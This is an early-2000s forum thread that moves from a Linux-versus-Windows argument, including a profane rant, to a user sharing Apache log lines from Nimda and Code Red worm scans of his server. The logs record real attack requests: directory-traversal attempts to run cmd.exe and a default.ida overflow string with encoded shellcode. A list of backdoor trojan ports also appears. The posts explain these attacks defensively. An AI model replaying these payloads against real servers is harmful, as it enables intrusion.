Virus Alert

[Wij]

Originally posted by testin_da_cable
lol very true Trebz


Jas if you think windows is fine, then by all means keep using it matey. I obviously don't think it's fine so I chose to start using linux [about 3 years ago] and didn't look back. Now I use it exclusively.

How do you play Age of Kings or Max Payne etc... etc... ?

 

[Embattle]

He hopes that company has folded

 

[Testin da Cable]

simple: I don't.
though I may in the future if they get ported. in fact, I believe an AoK port is under way.

well, to let you in on a little secret I've got a win98se install on an unused partition. I played MaxPayne with much enjoyment, and I'm going to buy MythIII:exile. Myth is so beautiful it would be worth running w98 just to play.
Still, there's a little something called 'win4lin' [wine is another option] that's capable of running msoffice under linux. If it can do that, it may well be able to run Myth. Going to try at least heh

 

[Wij]

I doubt it will run games well

My PC is for games and surfing for erm... things of interest... um, yes.

So I'm happy with Windows

 

[Testin da Cable]

I'm not too sure either
Still, I can live with playing a game on windows.

 

[Wij]

Ooh, he's cracking

 

[~Lazarus~]

and.... ermm.... wtf has this to do with the virus ?

 

[Wij]

We've moved on a bit. Get over it

 

[granny]

Look, some people do things that mean linux is simply not feasible for them - I *have* to use M$ Office apps, I play games (LOTS of games not jsut the 0.02% of them that also happen to be ported to linux), I use things like 3dsmax etc etc. Now someone could easily pop up and say "use staroffice, play q3, use blender & gimp" which is fine but I DON'T WANT TO USE THOSE THINGS, I NEED TO USE THE OTHER APPS. Therefore for me, and other people with similar needs (note I say NEEDS not wants) linux is pointless, so stop fucking trying to sell it to us ok?

For other people who have the luxury of not having to use such proprietary file formats and apps then yes, linux may well be fantastic and a far better, more stable and secure and less buggy solution than windows in any form. Fine, I'm happy for you, good luck to you, but stop fucking evangalising about your fucking choice of OS, we really could care less.

And as for all the stuff about microsoft profiteering and bullying tactics, well, go fuck yourselves, I'm sorry, this *is* capitalism we live under, that's an inherant part of it, and no, I'm not justifying it, I agree that it's wrong it's just that I think the only way to do anything about it is to stop fucking whinging and get off your arse and fight for an alternative. If you're not will to do that then I repeat my earlier request for you to shut the fuck up and fuck the cunt off.

*ahem*

Soz for the rant, one of those days.... funnily enough one of those days that included 2 hours of trying to remove W32.Nimda.a from several machines here

 

[Wij]

/me takes the coffee pot away from Granny :/

 

[Will]

Originally posted by granny
...so stop fucking trying to sell it to us ok?

...I think the only way to do anything about it is to stop fucking whinging and get off your arse and fight for an alternative.

Sorry to so blantantly wind you up after a rant like that, but I couldn't resist it.

 

[Testin da Cable]

Grans, if you don't want to hear my answer then don't ask me a question ok?*






*not just you tho, I'm speaking generally heh
**dun worry, I have those kinda days too
***don't swear so much, it's not good for you
****nobody _has_ to do anything, it's all choice

 

[old.Jas]

Granny : you deserve a reward for that fine rant

 

[Summo]

Howsabout a clip roun' the ear?

 

[Testin da Cable]

or a beer?
it _is_ friday after all

 

[DAN200]

For me Friday is the day of good stuff on Telly, nothing more...

 

[Testin da Cable]

good god

I slapped up Apache [webserver] this morning to try summat while at workies.
Looking through the logs after I got home, I find I've been scanned by "nimda" infected pc's about a zillion times in the ~15 hrs the server has been up. Nothing doing heh as Apache has no idea what the worm wants and just logs an error. Rather large logfile tho. I'll post a bit of it so you guys can see what happens when the worm scans a webserver....

/me goes off to get a choice bit 'o log

 

[Summo]

Hurry!



My little ZoneAlarm log is showing 94 attempts at access to my PC in the few hours I've been online since getting back from work. I'd normally expect 5-10 in that time.

 

[Testin da Cable]

goes a little something like this:

213.11.168.2 - - [21/Sep/2001:13:05:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.11.168.2 - - [21/Sep/2001:13:05:25 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.11.168.2 - - [21/Sep/2001:13:05:25 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 23

what you're reading is a request from that IP number attempting to force my webserver to execute some commands.
[which it won't...but even it it were forced to try somehow it wouldn't be able to anyway heh]

 

[Testin da Cable]

I also get this [several different IP's] every 4 mins or so:

213.46.140.36 - - [21/Sep/2001:13:30:04 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

heh nice fingerprint =P

 

[Testin da Cable]

k, I'll be extra nice for a sec...
if you're feeling a bit wonky about your OS right now...like you forgot to turn on that 'ole firewall & virus scanner or something...
pm me your IP and I'll scan your ports for evilness.
be aware: a portscan won't tell you if you've got a 'nimda' infestation [or anything else that doesn't bind to a port] -you need a good virusscanner for that, but it will tell you if you've got one of these beasties [example]:

12345/tcp  open        NetBus                  
12346/tcp  open        NetBus                  
31337/tcp  open        Elite

on the other hand, you can get yourself scanned any number of ways, for instance by a nice man called Steve over at grc.com. that is, if he hasn't been ddos'd off the face of the planet by skript kiddiots again